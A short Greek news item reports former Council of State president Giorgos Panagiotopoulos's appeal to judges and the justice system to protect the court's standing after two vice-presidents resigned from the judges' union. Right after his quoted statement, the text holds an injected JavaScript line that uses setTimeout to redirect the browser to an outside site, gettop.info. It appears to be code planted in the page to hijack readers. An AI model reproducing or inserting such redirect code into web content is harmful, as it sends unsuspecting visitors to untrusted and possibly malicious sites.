Έκκληση τέως Προέδρου του ΣτΕ για προστασία του κύρους του

0
3

 

Έκκληση προς όλους τους δικαστές του Συμβουλίου της Επικρατείας αλλά και τους εμπλεκόμενους φορείς της Δικαιοσύνης, να προστατεύσουν το κύρος του θεσμού του Συμβουλίου της Επικρατείας απηύθυνε ο μακροβιότερος πρόεδρος του Ανώτατου Δικαστηρίου Γιώργος Παναγιωτόπουλος.

Με αφορμή τις παραιτήσεις των δύο αντιπροέδρων από την Ένωση Δικαστών του Συμβουλίου της Επικρατείας, ο κ. Παναγιωτόπουλος σε δήλωσή του αναφέρει:

«Με την ιδιότητα εκείνου που από την πλήρη εφαρμογή της συνταγματικής διάταξης η οποία επιβάλλει την 4ετία στη θέση του προέδρου του Συμβουλίου Επικρατείας, είμαι ο μόνος που έχω υπηρετήσει επί μια 4ετία, καλώ όλους τους αγαπητούς πρώην συναδέλφους, καλώ επίσης και όλους τους εμπλεκόμενους στη Δικαιοσύνη, με συνεννόηση και αγαθή προαίρεση και μέσα σε δημοκρατικά πλαίσια να προστατεύσουν το κύρος του θεσμού του Συμβουλίου Επικρατείας.
Ο θεσμός είναι απαραίτητος για την λειτουργία της πολιτείας και της κοινωνίας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here